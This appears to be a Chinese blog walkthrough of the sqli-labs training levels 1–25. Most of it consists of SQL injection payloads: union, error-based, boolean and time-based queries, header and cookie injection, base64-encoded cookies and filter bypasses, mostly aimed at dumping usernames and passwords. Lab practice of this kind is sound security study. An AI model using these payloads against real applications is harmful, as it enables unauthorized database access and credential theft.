sql注入练习之——sqli-labs 1-25

第一关:
注入点:‘连接的字符串
在这里插入图片描述
数据脱库:
-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- -
在这里插入图片描述
第二关:
注入点:数值型
在这里插入图片描述
数据脱库:
-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–

在这里插入图片描述
第三关:
注入点:’)分割字符型
在这里插入图片描述
数据脱库:
?id=-1’) union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–
在这里插入图片描述
第四关:
注入点:")分割字符型
在这里插入图片描述
数据脱库:
?id=-1") union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–
在这里插入图片描述
第五关:
注入点:单引号为边界的字符串错误注入
在这里插入图片描述
数据脱库:
?id=1’ and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name) ,1,20)from information_schema.schemata)),1)-- -
在这里插入图片描述
第六关:
注入点:双引号为边界的字符串错误注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第七关:
注入点:’))为边界的字符串布尔注入
在这里插入图片描述
查看数据库长度:
?id=1’)) and (length(database()))=8-- -
在这里插入图片描述
第八关:
注入点:单引号为边界的字符串布尔注入
在这里插入图片描述
查看数据库长度:
?id=1’ and (length(database()))=8-- -
在这里插入图片描述
第九关:
注入点:’延时注入
在这里插入图片描述
查看数据库长度:
?id=2’ and if(length(database())=8,sleep(5),0)-- -
在这里插入图片描述
第十关:
注入点:双引号延时注入
在这里插入图片描述
查看数据库长度:
?id=2" and if(length(database())=8,sleep(5),0)-- -
在这里插入图片描述
第十一关:
注入点:单引号为边界的字符串union注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十二关:
注入点:”)为边界的字符串union注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十三关:
注入点:’)边界的字符串报错注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十四关:
注入点:”边界的字符串报错注入
在这里插入图片描述
数据脱库:
在这里插入图片描述

第十五关:
注入点:单引号布尔
查看数据库长度:
在这里插入图片描述
第十六关:
注入点:双引号括号布尔
查看数据库长度:
在这里插入图片描述
第十七关:
注入点:基于单引号报错
数据脱库:
在这里插入图片描述
第十八关:
注入点:单引号http头部User-Agent注入
数据脱库:
1’ and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1) and ‘1’=‘1
在这里插入图片描述
第十九关:
注入点:单引号http头部Referer注入
数据脱库:
在这里插入图片描述
第二十关:
注入点:单引号cookie
数据脱库:更改coolie后forward
Cookie: uname=admin’and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1)-- -
在这里插入图片描述
第二十一关:
注入点:’)cookie加base64解码
数据脱库:
YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHJpbmcoZ3JvdXBfY29uY2F0KGNvbmNhdF93cygweDdlLHVzZXJuYW1lLHBhc3N3b3JkKSkgLDEsMjApZnJvbSBzZWN1cml0eS51c2VycykpLDEpLS0gLQ==
在这里插入图片描述
第二十二关:
注入点:”cookie加base64解码(题显示还是21,实际是22)
数据脱库:
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHN1YnN0cmluZyhncm91cF9jb25jYXQoY29uY2F0X3dzKDB4N2UsdXNlcm5hbWUscGFzc3dvcmQpKSAsMSwyMClmcm9tIHNlY3VyaXR5LnVzZXJzKSksMSktLSAt
在这里插入图片描述
第二十三关:
注入点:’过滤#、–、+
数据脱库:将注释改为’
?id=-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from security.users),3’
在这里插入图片描述
第二十四关:
注入点:二次注入
数据脱库:注册一个admin-- -用户,修改密码时直接修改了admin的密码
在这里插入图片描述
第二十五关:
注入点:单引号报错,屏蔽or and
数据脱库:关键字套关键字
?id=-1’ anandd updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,passwoorrd)) ,1,20)from security.users)),1)-- -
在这里插入图片描述
第二十五a关:
注入点:数值 屏蔽or and #
数据脱库:延时或联合
?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,passwoorrd))from security.users),3-- -
在这里插入图片描述

  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值